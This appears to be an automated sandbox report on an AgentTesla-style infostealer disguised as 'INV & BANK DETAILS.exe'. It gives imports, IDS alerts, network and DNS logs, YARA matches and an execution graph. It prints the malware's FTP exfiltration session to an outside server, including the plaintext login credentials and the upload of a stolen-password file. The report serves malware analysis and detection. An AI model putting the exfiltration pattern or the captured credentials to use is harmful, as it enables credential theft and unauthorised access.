GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                              Language of compilation systemCountry where language is spokenMap
                              EnglishGreat Britain
                              EnglishUnited States
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-13T08:30:17.871461+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.849706195.252.110.25321TCP
                              2024-11-13T08:30:18.639491+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849707195.252.110.25349556TCP
                              2024-11-13T08:30:18.644980+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849707195.252.110.25349556TCP
                              2024-11-13T08:30:30.270194+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849708TCP
                              2024-11-13T08:31:08.643253+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849713TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 13, 2024 08:30:14.207704067 CET4970580192.168.2.8208.95.112.1
                              Nov 13, 2024 08:30:14.212654114 CET8049705208.95.112.1192.168.2.8
                              Nov 13, 2024 08:30:14.212721109 CET4970580192.168.2.8208.95.112.1
                              Nov 13, 2024 08:30:14.213845015 CET4970580192.168.2.8208.95.112.1
                              Nov 13, 2024 08:30:14.218687057 CET8049705208.95.112.1192.168.2.8
                              Nov 13, 2024 08:30:14.806299925 CET8049705208.95.112.1192.168.2.8
                              Nov 13, 2024 08:30:14.854320049 CET4970580192.168.2.8208.95.112.1
                              Nov 13, 2024 08:30:15.422077894 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:15.427047968 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:15.427129030 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:16.197187901 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:16.197463989 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:16.202282906 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:16.468326092 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:16.468491077 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:16.473347902 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:16.801714897 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:16.801976919 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:16.806824923 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.067331076 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.067514896 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:17.072489977 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.332786083 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.333648920 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:17.338625908 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.598484039 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.598758936 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:17.603609085 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.863738060 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.866269112 CET4970749556192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:17.871202946 CET4955649707195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:17.871309996 CET4970749556192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:17.871460915 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:17.876239061 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:18.639179945 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:18.639491081 CET4970749556192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:18.639534950 CET4970749556192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:18.644434929 CET4955649707195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:18.644891024 CET4955649707195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:18.644979954 CET4970749556192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:18.682507038 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:18.908122063 CET2149706195.252.110.253192.168.2.8
                              Nov 13, 2024 08:30:18.963701963 CET4970621192.168.2.8195.252.110.253
                              Nov 13, 2024 08:30:56.502726078 CET8049705208.95.112.1192.168.2.8
                              Nov 13, 2024 08:30:56.502851963 CET4970580192.168.2.8208.95.112.1
                              Nov 13, 2024 08:31:05.339797974 CET4970580192.168.2.8208.95.112.1
                              Nov 13, 2024 08:31:05.344718933 CET8049705208.95.112.1192.168.2.8
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 13, 2024 08:30:14.191477060 CET5280153192.168.2.81.1.1.1
                              Nov 13, 2024 08:30:14.198579073 CET53528011.1.1.1192.168.2.8
                              Nov 13, 2024 08:30:15.331677914 CET5862653192.168.2.81.1.1.1
                              Nov 13, 2024 08:30:15.421175003 CET53586261.1.1.1192.168.2.8
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 13, 2024 08:30:14.191477060 CET192.168.2.81.1.1.10x821eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                              Nov 13, 2024 08:30:15.331677914 CET192.168.2.81.1.1.10x4ddbStandard query (0)ftp.jeepcommerce.rsA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 13, 2024 08:30:14.198579073 CET1.1.1.1192.168.2.80x821eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                              Nov 13, 2024 08:30:15.421175003 CET1.1.1.1192.168.2.80x4ddbNo error (0)ftp.jeepcommerce.rs195.252.110.253A (IP address)IN (0x0001)false
                              • ip-api.com
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.849705208.95.112.1803284C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              TimestampBytes transferredDirectionData
                              Nov 13, 2024 08:30:14.213845015 CET80OUTGET /line/?fields=hosting HTTP/1.1
                              Host: ip-api.com
                              Connection: Keep-Alive
                              Nov 13, 2024 08:30:14.806299925 CET174INHTTP/1.1 200 OK
                              Date: Wed, 13 Nov 2024 07:30:13 GMT
                              Content-Type: text/plain; charset=utf-8
                              Content-Length: 5
                              Access-Control-Allow-Origin: *
                              X-Ttl: 60
                              X-Rl: 44
                              Data Raw: 74 72 75 65 0a
                              Data Ascii: true


                              TimestampSource PortDest PortSource IPDest IPCommands
                              Nov 13, 2024 08:30:16.197187901 CET2149706195.252.110.253192.168.2.8220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21.220-This is a private system - No anonymous login
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 08:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Nov 13, 2024 08:30:16.197463989 CET4970621192.168.2.8195.252.110.253USER me750@jeepcommerce.rs
                              Nov 13, 2024 08:30:16.468326092 CET2149706195.252.110.253192.168.2.8331 User me750@jeepcommerce.rs OK. Password required
                              Nov 13, 2024 08:30:16.468491077 CET4970621192.168.2.8195.252.110.253PASS UL^Y]#$dMj?2
                              Nov 13, 2024 08:30:16.801714897 CET2149706195.252.110.253192.168.2.8230 OK. Current restricted directory is /
                              Nov 13, 2024 08:30:17.067331076 CET2149706195.252.110.253192.168.2.8504 Unknown command
                              Nov 13, 2024 08:30:17.067514896 CET4970621192.168.2.8195.252.110.253PWD
                              Nov 13, 2024 08:30:17.332786083 CET2149706195.252.110.253192.168.2.8257 "/" is your current location
                              Nov 13, 2024 08:30:17.333648920 CET4970621192.168.2.8195.252.110.253TYPE I
                              Nov 13, 2024 08:30:17.598484039 CET2149706195.252.110.253192.168.2.8200 TYPE is now 8-bit binary
                              Nov 13, 2024 08:30:17.598758936 CET4970621192.168.2.8195.252.110.253PASV
                              Nov 13, 2024 08:30:17.863738060 CET2149706195.252.110.253192.168.2.8227 Entering Passive Mode (195,252,110,253,193,148)
                              Nov 13, 2024 08:30:17.871460915 CET4970621192.168.2.8195.252.110.253STOR PW_user-536720_2024_11_13_02_30_14.html
                              Nov 13, 2024 08:30:18.639179945 CET2149706195.252.110.253192.168.2.8150 Accepted data connection
                              Nov 13, 2024 08:30:18.908122063 CET2149706195.252.110.253192.168.2.8226-File successfully transferred
                              226-File successfully transferred226 0.269 seconds (measured here), 1.16 Kbytes per second

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:02:30:10
                              Start date:13/11/2024
                              Path:C:\Users\user\Desktop\INV & BANK DETAILS.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\INV & BANK DETAILS.exe"
                              Imagebase:0x400000
                              File size:949'887 bytes
                              MD5 hash:FC4DA7BE71AC1824D53D208381E5CDF9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1431447350.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:02:30:12
                              Start date:13/11/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\INV & BANK DETAILS.exe"
                              Imagebase:0x5e0000
                              File size:45'984 bytes
                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.3865437194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3866572606.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3866572606.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3866572606.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:3.8%
                                Dynamic/Decrypted Code Coverage:0.4%
                                Signature Coverage:9.5%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:41
                                execution_graph 86181 4010e0 86184 401100 86181->86184 86183 4010f8 86185 401113 86184->86185 86187 401120 86185->86187 86188 401184 86185->86188 86189 40114c 86185->86189 86215 401182 86185->86215 86186 40112c DefWindowProcW 86186->86183 86187->86186 86229 401000 Shell_NotifyIconW __cftoa_l 86187->86229 86222 401250 61 API calls __cftoa_l 86188->86222 86191 401151 86189->86191 86192 40119d 86189->86192 86196 401219 86191->86196 86197 40115d 86191->86197 86194 4011a3 86192->86194 86195 42afb4 86192->86195 86193 401193 86193->86183 86194->86187 86203 4011b6 KillTimer 86194->86203 86204 4011db SetTimer RegisterWindowMessageW 86194->86204 86224 40f190 10 API calls 86195->86224 86196->86187 86201 401225 86196->86201 86200 401163 86197->86200 86205 42b01d 86197->86205 86206 42afe9 86200->86206 86207 40116c 86200->86207 86231 468b0e 74 API calls __cftoa_l 86201->86231 86202 42b04f 86230 40e0c0 74 API calls __cftoa_l 86202->86230 86223 401000 Shell_NotifyIconW __cftoa_l 86203->86223 86204->86193 86213 401204 CreatePopupMenu 86204->86213 86205->86186 86228 4370f4 52 API calls 86205->86228 86226 40f190 10 API calls 86206->86226 86207->86187 86208 401174 86207->86208 86225 45fd57 65 API calls __cftoa_l 86208->86225 86213->86183 86215->86186 86216 42afe4 86216->86193 86217 42b00e 86227 401a50 398 API calls 86217->86227 86218 4011c9 PostQuitMessage 86218->86183 86221 42afdc 86221->86186 86221->86216 86222->86193 86223->86218 86224->86193 86225->86221 86226->86217 86227->86215 86228->86215 86229->86202 86230->86215 86231->86216 86232 42d142 86236 480a8d 86232->86236 86234 42d14f 86235 480a8d 259 API calls 86234->86235 86235->86234 86237 480ae4 86236->86237 86238 480b26 86236->86238 86240 480aeb 86237->86240 86241 480b15 86237->86241 86267 40bc70 86238->86267 86243 480aee 86240->86243 86244 480b04 86240->86244 86278 4805bf 259 API calls 86241->86278 86243->86238 86245 480af3 86243->86245 86277 47fea2 259 API calls __itow_s 86244->86277 86276 47f135 259 API calls 86245->86276 86251 480aff 86305 408f40 86251->86305 86252 481156 86254 408f40 VariantClear 86252->86254 86253 40c2c0 52 API calls 86265 480b2e 86253->86265 86255 48115e 86254->86255 86255->86234 86256 480ff5 86304 45e737 90 API calls 3 library calls 86256->86304 86259 40e710 53 API calls 86259->86265 86260 40a780 259 API calls 86260->86265 86262 408e80 VariantClear 86262->86265 86265->86251 86265->86253 86265->86256 86265->86259 86265->86260 86265->86262 86272 40e0a0 86265->86272 86279 401980 86265->86279 86287 45377f 52 API calls 86265->86287 86288 45e951 53 API calls 86265->86288 86289 40e830 86265->86289 86302 47925f 53 API calls 86265->86302 86303 47fcff 259 API calls 86265->86303 86309 4115d7 86267->86309 86270 4115d7 52 API calls 86271 40bca6 86270->86271 86271->86265 86273 40e0b2 86272->86273 86274 40e0a8 86272->86274 86273->86265 86343 403c30 52 API calls _memmove 86274->86343 86276->86251 86277->86251 86278->86251 86280 4019a3 86279->86280 86282 401985 86279->86282 86281 4019b8 86280->86281 86280->86282 86345 403e10 53 API calls 86281->86345 86284 40199f 86282->86284 86344 403e10 53 API calls 86282->86344 86284->86265 86285 4019c4 86285->86265 86287->86265 86288->86265 86290 427c86 86289->86290 86291 40e84a 86289->86291 86347 40e1f0 VariantClear moneypunct 86290->86347 86346 40e950 53 API calls 86291->86346 86294 40e84f 86295 427c8b 86294->86295 86296 40e85c 86294->86296 86348 40e950 53 API calls 86295->86348 86298 4115d7 52 API calls 86296->86298 86301 40e907 86296->86301 86299 40e8fc 86298->86299 86300 4115d7 52 API calls 86299->86300 86300->86301 86301->86265 86302->86265 86303->86265 86304->86251 86306 408f48 moneypunct 86305->86306 86307 4265c7 VariantClear 86306->86307 86308 408f55 moneypunct 86306->86308 86307->86308 86308->86252 86311 4115e1 _malloc 86309->86311 86312 40bc98 86311->86312 86315 4115fd std::exception::exception 86311->86315 86320 4135bb 86311->86320 86312->86270 86313 41163b 86335 4180af 46 API calls std::exception::operator= 86313->86335 86315->86313 86334 41130a 51 API calls __cinit 86315->86334 86316 411645 86336 418105 RaiseException 86316->86336 86319 411656 86321 413638 _malloc 86320->86321 86323 4135c9 _malloc 86320->86323 86342 417f77 46 API calls __getptd_noexit 86321->86342 86322 4135d4 86322->86323 86337 418901 46 API calls __NMSG_WRITE 86322->86337 86338 418752 46 API calls 7 library calls 86322->86338 86339 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86322->86339 86323->86322 86326 4135f7 RtlAllocateHeap 86323->86326 86329 413624 86323->86329 86332 413622 86323->86332 86326->86323 86327 413630 86326->86327 86327->86311 86340 417f77 46 API calls __getptd_noexit 86329->86340 86341 417f77 46 API calls __getptd_noexit 86332->86341 86334->86313 86335->86316 86336->86319 86337->86322 86338->86322 86340->86332 86341->86327 86342->86327 86343->86273 86344->86284 86345->86285 86346->86294 86347->86295 86348->86301 86349 40bd20 86350 428194 86349->86350 86351 40bd2d 86349->86351 86353 40bd43 86350->86353 86355 4281bc 86350->86355 86357 4281b2 86350->86357 86352 40bd37 86351->86352 86372 4531b1 85 API calls 5 library calls 86351->86372 86361 40bd50 86352->86361 86371 45e987 86 API calls moneypunct 86355->86371 86370 40b510 VariantClear 86357->86370 86360 4281ba 86362 426cf1 86361->86362 86363 40bd63 86361->86363 86382 44cde9 52 API calls _memmove 86362->86382 86373 40bd80 86363->86373 86366 40bd73 86366->86353 86367 426cfc 86368 40e0a0 52 API calls 86367->86368 86369 426d02 86368->86369 86370->86360 86371->86351 86372->86352 86374 40bd8e 86373->86374 86381 40bdb7 _memmove 86373->86381 86375 40bded 86374->86375 86376 40bdad 86374->86376 86374->86381 86377 4115d7 52 API calls 86375->86377 86383 402f00 86376->86383 86379 40bdf6 86377->86379 86380 4115d7 52 API calls 86379->86380 86379->86381 86380->86381 86381->86366 86382->86367 86384 402f0c 86383->86384 86386 402f10 86383->86386 86384->86381 86385 4268c3 86386->86385 86387 4115d7 52 API calls 86386->86387 86388 402f51 moneypunct _memmove 86387->86388 86388->86381 86389 425ba2 86394 40e360 86389->86394 86391 425bb4 86410 41130a 51 API calls __cinit 86391->86410 86393 425bbe 86395 4115d7 52 API calls 86394->86395 86396 40e3ec GetModuleFileNameW 86395->86396 86411 413a0e 86396->86411 86398 40e421 _wcsncat 86414 413a9e 86398->86414 86401 4115d7 52 API calls 86402 40e45e _wcscpy 86401->86402 86403 40bc70 52 API calls 86402->86403 86404 40e498 86403->86404 86417 40e4c0 86404->86417 86406 40e4a9 86406->86391 86407 401c90 52 API calls 86409 40e4a1 _wcscat _wcslen _wcsncpy 86407->86409 86408 4115d7 52 API calls 86408->86409 86409->86406 86409->86407 86409->86408 86410->86393 86431 413801 86411->86431 86461 419efd 86414->86461 86473 403350 86417->86473 86419 40e4cb RegOpenKeyExW 86420 427190 RegQueryValueExW 86419->86420 86421 40e4eb 86419->86421 86422 4271b0 86420->86422 86423 42721a RegCloseKey 86420->86423 86421->86409 86424 4115d7 52 API calls 86422->86424 86423->86409 86425 4271cb 86424->86425 86480 43652f 52 API calls 86425->86480 86427 4271d8 RegQueryValueExW 86428 42720e 86427->86428 86429 4271f7 86427->86429 86428->86423 86481 402160 86429->86481 86432 41381a 86431->86432 86433 41389e 86431->86433 86432->86433 86444 41388a 86432->86444 86453 419e30 46 API calls __read_nolock 86432->86453 86434 4139e8 86433->86434 86435 413a00 86433->86435 86458 417f77 46 API calls __getptd_noexit 86434->86458 86460 417f77 46 API calls __getptd_noexit 86435->86460 86437 4139ed 86459 417f25 10 API calls __read_nolock 86437->86459 86441 41396c 86441->86433 86442 413967 86441->86442 86445 41397a 86441->86445 86442->86398 86443 413929 86443->86433 86446 413945 86443->86446 86455 419e30 46 API calls __read_nolock 86443->86455 86444->86433 86452 413909 86444->86452 86454 419e30 46 API calls __read_nolock 86444->86454 86457 419e30 46 API calls __read_nolock 86445->86457 86446->86433 86446->86442 86449 41395b 86446->86449 86456 419e30 46 API calls __read_nolock 86449->86456 86452->86441 86452->86443 86453->86444 86454->86452 86455->86446 86456->86442 86457->86442 86458->86437 86459->86442 86460->86442 86462 419f13 86461->86462 86463 419f0e 86461->86463 86470 417f77 46 API calls __getptd_noexit 86462->86470 86463->86462 86467 419f2b 86463->86467 86465 419f18 86471 417f25 10 API calls __read_nolock 86465->86471 86469 40e454 86467->86469 86472 417f77 46 API calls __getptd_noexit 86467->86472 86469->86401 86470->86465 86471->86469 86472->86465 86474 403367 86473->86474 86475 403358 86473->86475 86476 4115d7 52 API calls 86474->86476 86475->86419 86477 403370 86476->86477 86478 4115d7 52 API calls 86477->86478 86479 40339e 86478->86479 86479->86419 86480->86427 86482 426daa 86481->86482 86483 40216b _wcslen 86481->86483 86496 40c600 86482->86496 86486 402180 86483->86486 86487 40219e 86483->86487 86485 426db5 86485->86428 86494 403bd0 52 API calls moneypunct 86486->86494 86495 4013a0 52 API calls 86487->86495 86490 4021a5 86492 426db7 86490->86492 86493 4115d7 52 API calls 86490->86493 86491 402187 _memmove 86491->86428 86493->86491 86494->86491 86495->86490 86497 40c619 86496->86497 86498 40c60a 86496->86498 86497->86485 86498->86497 86501 4026f0 86498->86501 86500 426d7a _memmove 86500->86485 86502 426873 86501->86502 86503 4026ff 86501->86503 86508 4013a0 52 API calls 86502->86508 86503->86500 86505 42687b 86506 4115d7 52 API calls 86505->86506 86507 42689e _memmove 86506->86507 86507->86500 86508->86505 86509 416454 86546 416c70 86509->86546 86511 416460 GetStartupInfoW 86512 416474 86511->86512 86547 419d5a HeapCreate 86512->86547 86514 4164cd 86515 4164d8 86514->86515 86630 41642b 46 API calls 3 library calls 86514->86630 86548 417c20 GetModuleHandleW 86515->86548 86518 4164de 86519 4164e9 __RTC_Initialize 86518->86519 86631 41642b 46 API calls 3 library calls 86518->86631 86567 41aaa1 GetStartupInfoW 86519->86567 86523 416503 GetCommandLineW 86580 41f584 GetEnvironmentStringsW 86523->86580 86527 416513 86586 41f4d6 GetModuleFileNameW 86527->86586 86529 41651d 86530 416528 86529->86530 86633 411924 46 API calls 3 library calls 86529->86633 86590 41f2a4 86530->86590 86533 41652e 86534 416539 86533->86534 86634 411924 46 API calls 3 library calls 86533->86634 86604 411703 86534->86604 86537 416541 86539 41654c __wwincmdln 86537->86539 86635 411924 46 API calls 3 library calls 86537->86635 86608 40d6b0 86539->86608 86542 41657c 86637 411906 46 API calls _doexit 86542->86637 86545 416581 _flsall 86546->86511 86547->86514 86549 417c34 86548->86549 86550 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86548->86550 86638 4178ff 49 API calls _free 86549->86638 86552 417c87 TlsAlloc 86550->86552 86555 417cd5 TlsSetValue 86552->86555 86556 417d96 86552->86556 86553 417c39 86553->86518 86555->86556 86557 417ce6 __init_pointers 86555->86557 86556->86518 86639 418151 InitializeCriticalSectionAndSpinCount 86557->86639 86559 417d91 86647 4178ff 49 API calls _free 86559->86647 86561 417d2a 86561->86559 86640 416b49 86561->86640 86564 417d76 86646 41793c 46 API calls 4 library calls 86564->86646 86566 417d7e GetCurrentThreadId 86566->86556 86568 416b49 __calloc_crt 46 API calls 86567->86568 86575 41aabf 86568->86575 86569 4164f7 86569->86523 86632 411924 46 API calls 3 library calls 86569->86632 86570 41ac6a GetStdHandle 86572 41ac34 86570->86572 86571 41acce SetHandleCount 86571->86569 